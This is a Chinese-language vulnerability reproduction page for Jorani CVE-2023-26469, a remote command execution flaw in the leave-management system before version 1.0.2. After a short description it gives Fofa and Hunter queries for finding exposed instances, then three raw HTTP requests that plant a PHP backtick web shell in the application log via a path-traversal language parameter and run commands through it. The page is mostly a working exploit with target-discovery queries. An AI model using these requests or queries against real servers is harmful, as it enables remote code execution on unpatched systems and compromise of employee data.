Jorani远程命令执行漏洞 CVE-2023-26469
- 漏洞描述
- 漏洞影响
- 漏洞危害
- 网络测绘
- Fofa: title="Jorani"
- Hunter: web.title="Jorani"
- 漏洞复现
- 1. 获取cookie
- 2. 构造poc
- 3. 执行命令
漏洞描述
Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。
漏洞影响
Jorani < 1.0.2
漏洞危害
攻击者可以利用路径遍历来访问文件并在服务器上执行代码。
网络测绘
Fofa: title=“Jorani”
Hunter: web.title=“Jorani”
漏洞复现
1. 获取cookie
GET /session/login HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
2. 构造poc
POST /session/login HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?
Cookie: csrf_cookie_jorani=a3ab3adxxxxxxxxxx4606ecdd;jorani_session=smgd1ebvn2pxxxxxxxxxxxtbubagonjg
Content-Type: application/x-www-form-urlencoded
Content-Length: 160
csrf_test_jorani=a3ab3adxxxxxxxxxx4606ecdd&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<%3f%3d`$_GET[1]`%3f>&CipheredValue=test
3. 执行命令
GET /pages/view/log-2023-11-02?1=id HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?
X-REQUESTED-WITH: XMLHttpRequest
Cookie: csrf_cookie_jorani=a3ab3ada05xxxxxxxxxxx4606ecdd;jorani_session=vtj9ig0s557xxxxxxxxxxskr16
